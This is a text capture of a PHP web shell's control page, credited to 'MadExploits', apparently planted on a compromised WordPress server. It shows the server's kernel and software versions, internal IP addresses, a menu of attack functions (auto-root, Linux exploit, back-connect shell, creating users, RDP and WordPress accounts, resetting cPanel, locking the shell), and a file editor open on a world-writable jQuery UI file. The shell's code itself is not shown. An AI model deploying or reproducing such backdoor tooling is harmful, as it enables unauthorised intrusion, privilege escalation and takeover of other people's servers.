Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
blog /
wp-includes /
js /
jquery /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
accordion.min.js
8.38
KB
-rw-rw-rw-
autocomplete.min.js
8.09
KB
-rw-rw-rw-
button.min.js
7.07
KB
-rw-rw-rw-
core.min.js
3.91
KB
-rw-rw-rw-
datepicker.min.js
35.65
KB
-rw-rw-rw-
dialog.min.js
11.85
KB
-rw-rw-rw-
draggable.min.js
18.46
KB
-rw-rw-rw-
droppable.min.js
6.12
KB
-rw-rw-rw-
effect-blind.min.js
1.11
KB
-rw-rw-rw-
effect-bounce.min.js
1.22
KB
-rw-rw-rw-
effect-clip.min.js
918
B
-rw-rw-rw-
effect-drop.min.js
997
B
-rw-rw-rw-
effect-explode.min.js
1.15
KB
-rw-rw-rw-
effect-fade.min.js
515
B
-rw-rw-rw-
effect-fold.min.js
1.01
KB
-rw-rw-rw-
effect-highlight.min.js
789
B
-rw-rw-rw-
effect-puff.min.js
783
B
-rw-rw-rw-
effect-pulsate.min.js
798
B
-rw-rw-rw-
effect-scale.min.js
1.1
KB
-rw-rw-rw-
effect-shake.min.js
1.08
KB
-rw-rw-rw-
effect-size.min.js
3.27
KB
-rw-rw-rw-
effect-slide.min.js
962
B
-rw-rw-rw-
effect-transfer.min.js
857
B
-rw-rw-rw-
effect.min.js
13.11
KB
-rw-rw-rw-
menu.min.js
9.38
KB
-rw-rw-rw-
mouse.min.js
3.07
KB
-rw-rw-rw-
position.min.js
6.37
KB
-rw-rw-rw-
progressbar.min.js
2.41
KB
-rw-rw-rw-
resizable.min.js
17.99
KB
-rw-rw-rw-
selectable.min.js
4.16
KB
-rw-rw-rw-
selectmenu.min.js
8.19
KB
-rw-rw-rw-
slider.min.js
10.73
KB
-rw-rw-rw-
sortable.min.js
24.32
KB
-rw-rw-rw-
spinner.min.js
6.94
KB
-rw-rw-rw-
tabs.min.js
11.83
KB
-rw-rw-rw-
tooltip.min.js
5.57
KB
-rw-rw-rw-
widget.min.js
6.75
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mouse.min.js
/*! * jQuery UI Mouse 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/mouse/ */ !function(a){"function"==typeof define&&define.amd?define(["jquery","./widget"],a):a(jQuery)}(function(a){var b=!1;return a(document).mouseup(function(){b=!1}),a.widget("ui.mouse",{version:"1.11.4",options:{cancel:"input,textarea,button,select,option",distance:1,delay:0},_mouseInit:function(){var b=this;this.element.bind("mousedown."+this.widgetName,function(a){return b._mouseDown(a)}).bind("click."+this.widgetName,function(c){if(!0===a.data(c.target,b.widgetName+".preventClickEvent"))return a.removeData(c.target,b.widgetName+".preventClickEvent"),c.stopImmediatePropagation(),!1}),this.started=!1},_mouseDestroy:function(){this.element.unbind("."+this.widgetName),this._mouseMoveDelegate&&this.document.unbind("mousemove."+this.widgetName,this._mouseMoveDelegate).unbind("mouseup."+this.widgetName,this._mouseUpDelegate)},_mouseDown:function(c){if(!b){this._mouseMoved=!1,this._mouseStarted&&this._mouseUp(c),this._mouseDownEvent=c;var d=this,e=1===c.which,f=!("string"!=typeof this.options.cancel||!c.target.nodeName)&&a(c.target).closest(this.options.cancel).length;return!(e&&!f&&this._mouseCapture(c))||(this.mouseDelayMet=!this.options.delay,this.mouseDelayMet||(this._mouseDelayTimer=setTimeout(function(){d.mouseDelayMet=!0},this.options.delay)),this._mouseDistanceMet(c)&&this._mouseDelayMet(c)&&(this._mouseStarted=this._mouseStart(c)!==!1,!this._mouseStarted)?(c.preventDefault(),!0):(!0===a.data(c.target,this.widgetName+".preventClickEvent")&&a.removeData(c.target,this.widgetName+".preventClickEvent"),this._mouseMoveDelegate=function(a){return d._mouseMove(a)},this._mouseUpDelegate=function(a){return d._mouseUp(a)},this.document.bind("mousemove."+this.widgetName,this._mouseMoveDelegate).bind("mouseup."+this.widgetName,this._mouseUpDelegate),c.preventDefault(),b=!0,!0))}},_mouseMove:function(b){if(this._mouseMoved){if(a.ui.ie&&(!document.documentMode||document.documentMode<9)&&!b.button)return this._mouseUp(b);if(!b.which)return this._mouseUp(b)}return(b.which||b.button)&&(this._mouseMoved=!0),this._mouseStarted?(this._mouseDrag(b),b.preventDefault()):(this._mouseDistanceMet(b)&&this._mouseDelayMet(b)&&(this._mouseStarted=this._mouseStart(this._mouseDownEvent,b)!==!1,this._mouseStarted?this._mouseDrag(b):this._mouseUp(b)),!this._mouseStarted)},_mouseUp:function(c){return this.document.unbind("mousemove."+this.widgetName,this._mouseMoveDelegate).unbind("mouseup."+this.widgetName,this._mouseUpDelegate),this._mouseStarted&&(this._mouseStarted=!1,c.target===this._mouseDownEvent.target&&a.data(c.target,this.widgetName+".preventClickEvent",!0),this._mouseStop(c)),b=!1,!1},_mouseDistanceMet:function(a){return Math.max(Math.abs(this._mouseDownEvent.pageX-a.pageX),Math.abs(this._mouseDownEvent.pageY-a.pageY))>=this.options.distance},_mouseDelayMet:function(){return this.mouseDelayMet},_mouseStart:function(){},_mouseDrag:function(){},_mouseStop:function(){},_mouseCapture:function(){return!0}})});
Close